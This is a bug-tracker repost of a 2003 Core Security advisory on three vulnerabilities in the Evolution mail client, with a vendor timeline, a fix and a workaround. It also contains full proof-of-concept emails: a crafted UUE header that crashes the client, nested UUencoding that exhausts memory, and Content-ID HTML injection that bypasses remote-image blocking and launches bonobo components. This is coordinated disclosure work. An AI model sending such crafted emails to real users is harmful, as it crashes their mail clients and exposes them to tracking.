Description Daniel Ahlberg (RETIRED) 2003-03-20 03:06:44 UTC

CORE-2003-03-04-01: Multiple vulnerabilities in Ximian 's Evolution Mail User Agent 
 
From:  
CORE SECURITY TECHNOLOGIES ADVISORIES <advisories@coresecurity.com> 
 
 
To:  
bugtraq@securityfocus.com, vulnwatch@vulnwatch.org 
 
 
Date:  
Today 00.46.12 
 
 
                      Core Security Technologies Advisory 
                         http://www.coresecurity.com 
 
       Multiple vulnerabilities in Ximian's Evolution Mail User Agent 
 
 
Date Published: 2003-03-19 
 
Last Update: 2003-03-19 
 
Advisory ID: CORE-20030304-01 
 
Bugtraq IDs: 7117, 7118, 7119 
 
CVE CAN:  CAN-2003-0128 CAN-2003-0129 CAN-2003-0130 
 
Title: Multiple vulnerabilities in Ximian's Evolution Mail User Agent 
 
Class: Input validation error; 
       Failure to handle exceptional conditions; 
       Information Gathering 
 
Remotely Exploitable: Yes 
 
Locally Exploitable: Yes 
 
Advisory URL: 
 http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10 
 
Vendors contacted: 
 
- Ximian 
  . CORE notification: 2003-03-11 
  . Notification acknowledged by Ximian: 2003-03-11 
  . Fixes added by Ximian to CVS tree: 2003-03-12 
  . BID, CVE numbers assigned: 2003-03-18 
  . Roll out of fixes: 2003-03-19 
  . Advisory published: 2003-03-19 
 
Release Mode: COORDINATED RELEASE 
 
*Vulnerability Description:* 
 
 Ximian Evolution is a personal and workgroup information management 
 solution for Linux and UNIX-based systems. The software integrates 
 email, calendaring, meeting scheduling, contact management, and task 
 lists, in one application. For more information about Ximian 
 Evolution visit http://www.ximian.com 
  
 Three vulnerabilities were found that could lead to various forms of 
 exploitation ranging from denying to users the ability to read email, 
 provoke system unstability, bypassing security context checks for 
 email content and possibly execution of arbitrary commands on 
 vulnerable systems. 
  
 The following security vulnerabilities were found: 
 
 [CAN-2003-0128, BID 7117] 
 
 The Evolution mailer accepts UUEncoded content and will 
 transparently decode it. By including a specially crafted UUE header 
 as part of an otherwise perfectly normal email an attacker has the 
 ability to crash Evolution as soon as the mail is parsed. This makes 
 it particularly difficult to delete this email from Evolution's GUI 
 and prevents a user from reading email until the malicious mail is 
 removed from the mailbox. 
 
 All versions of Evolution that include the function 
 try_uudecoding in the module mail/mail-format.c are vulnerable. 
 
 [CAN-2003-0129, BID 7118] 
 
 Having the Evolution mailer process mail content UUencoded multiple 
 times will cause resource starvation. The MUA will try to allocate 
 memory until it dies, possibly leading to system unstability. 
 Our example in the technical details section uses email content 
 encoded 3 times. 
 
 [CAN-2003-0130, BID 7119] 
 
 By including a specially crafted MIME Content-ID header as part of 
 an image/* MIME part, it is possible to include arbitrary data, 
 including HTML tags, into the stream that is passed to GTKHtml for 
 rendering. 
 
 These vulknerabilities  provides multiple exploitation possibilities 
 in the Evolution mailer. Namely, it's possible: 
 
 a) To crash the application. The crash appears to be the result 
   of heap corruption, further research on this bug is required 
   to demostrate sucessfull exploitation to run arbitrary commands 
   on vulnerable systems. 
 
 b) To bypass the "Don't connect to remote hosts to fetch images" 
   option. 
 
 c) To execute some bonobo components and pass them arbitrary content, 
   included as part of the mail. 
 
*Vulnerable Packages:* 
 
 Evolution 1.2.2 and prior releases are vulnerable, partially or 
 wholly to the vulnerabilities in this advisory. 
 
*Solution/Vendor Information/Workaround:* 
 
 Ximian is providing Evolution 1.2.3 on [March 18/March 19]. This 
 release resolves all vulnerabilities in this advisory as well as 
 other unrelated bugs. The patched code for Evolution that resolves 
 these vulnerabilities is also already available in GNOME CVS. 
 
 A workaround for unpatched versions of Evolution to prevent Evolution 
 from crashing when viewing messages that exploit these 
 vulnerabilities is to go into "View"->"Message Display" and change 
 the value to "Show E-mail Source." 
 
 Distribution vendors who provide their own version of Evolution have 
 been advised of these issues as well as having been provided the 
 patches to fix them. They may provide updated packages for their 
 distributions. 
 
 
*Credits:* 
 
 These vulnerabilities were found by Diego Kelyacoubian, Javier Kohen, 
 Alberto Solino, and Juan Vera from Core Security Technologies during 
 Bugweek 2003 (March 3-7, 2003). 
 
 We would like to thank Carlos Montero Luque at Ximian for quickly 
 addressing our report and coordinating the generation and 
 public release of patches and information regarding these 
 vulnerabilities. 
  
 Thanks also to Jeffrey Stedfast and other members of the Evolution 
 development team for the followup and development of the patches to 
 close these vulnerabilities. 
 
*Technical Description - Exploit/Concept Code:* 
 
 [CAN-2003-0128, BID 7117] 
 
 The following email will reproduce this vulnerability, note that 
 an empty line is required before and after the UUE header line. 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: inline; filename=name 
Content-Type: application/octet-stream; name=name 
Content-Transfer-Encoding: 7bit 
 
begin 600 
  
end 
 
--=-mTDu5zdJIsixETTwCF5Y-- 
 
 
 [CAN-2003-0129, BID 7118] 
 
 The following email will reproduce this vulnerability. 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=3D-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: inline; filename=3Dname 
Content-Type: application/octet-stream; name=3Dname 
Content-Transfer-Encoding: 7bit 
 
begin 600 phase2 
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310 
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C 
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20\ 
M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC 
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T 
M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A- 
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@   
  
end 
--=3D-mTDu5zdJIsixETTwCF5Y-- 
 
 [CAN-2003-0130, BID 7119] 
 
 The handle_image() function, located in the module 
 mail/mail-format.c, lacks proper input checking. This function does 
 not escape HTML characters in the string returned by get_cid, which 
 is in turn constructed from the Content-ID MIME header included in 
 the MIME part. 
 
 It can be exploited several ways, for instance: 
 
 a) The Evolution mailer will crash when a MIME part's Content-ID is 
    referenced from two different object tags via the cid "protocol". 
    The following email will reproduce this vulnerability in Evolution 
    version 1.2.1: 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Type: text/plain 
Content-Transfer-Encoding: 7bit 
Content-Id: hello 
 
Hello World! 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: attachment; filename=name1.gif 
Content-Type: image/gif;  name=name1.gif 
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr " 
Content-Transfer-Encoding: base64 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: attachment; filename=name2.gif 
Content-Type: image/gif;  name=name2.gif 
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr " 
Content-Transfer-Encoding: base64 
 
--=-mTDu5zdJIsixETTwCF5Y 
 
 b) The following email bypasses the "Don't connect to remote hosts 
    to fetch images" option. 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Type: text/html 
Content-Transfer-Encoding: 7bit 
Content-Id: apart 
 
<img src="http://external.host.com:anyport"> 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: attachment; filename=name2.gif 
Content-Type: image/gif;  name=name2.gif 
Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr " 
Content-Transfer-Encoding: base64 
 
--=-mTDu5zdJIsixETTwCF5Y 
 
 c) It is possible to execute bonobo components to handle content 
    types that Evolution mailer does not handle internally (for example 
    audio/ulaw). The following mail uses the Content-ID bug to execute 
    the bonobo-audio-ulaw component (bundled by default with bonobo) 
    and pass it arbitrary content. 
 
 >From xxx@corest.com Wed Mar  5 14:06:02 2003 
Subject: xxx 
From: X X. X <xxx@corest.com> 
To: xxx@corest.com 
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" 
Message-Id: <1046884154.1731.5.camel@vaiolin> 
Mime-Version: 1.0 
Date: 05 Mar 2003 14:09:14 -0300 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Type: audio/ulaw 
Content-Transfer-Encoding: 7bit 
Content-Id: mysong 
 
There she was, just walking down the street... 
 
--=-mTDu5zdJIsixETTwCF5Y 
Content-Disposition: attachment; filename=name2.gif 
Content-Type: image/gif;  name=name2.gif 
Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr " 
Content-Transfer-Encoding: base64 
 
--=-mTDu5zdJIsixETTwCF5Y 
 
 
*About Core Security Technologies* 
  
 Core Security Technologies develops strategic security solutions for 
 Fortune 1000 corporations, government agencies and military 
 organizations. The company offers information security software and 
 services designed to assess risk and protect and manage information assets. 
 Headquartered in Boston, MA, Core Security Technologies can be reached at 
 617-399-6980 or on the Web at http://www.coresecurity.com. 
 
 To learn more about CORE IMPACT, the first comprehensive penetration 
 testing framework, visit http://www.coresecurity.com/products/coreimpact 
 
*DISCLAIMER:* 
 
 The contents of this advisory are copyright (c) 2003 CORE Security 
 Technologies and may be distributed freely provided that no fee is 
 charged for this distribution and proper credit is given. 
 
$Id: Ximian-Evolution-advisory.txt,v 1.2 2003/03/19 23:05:30 iarce Exp $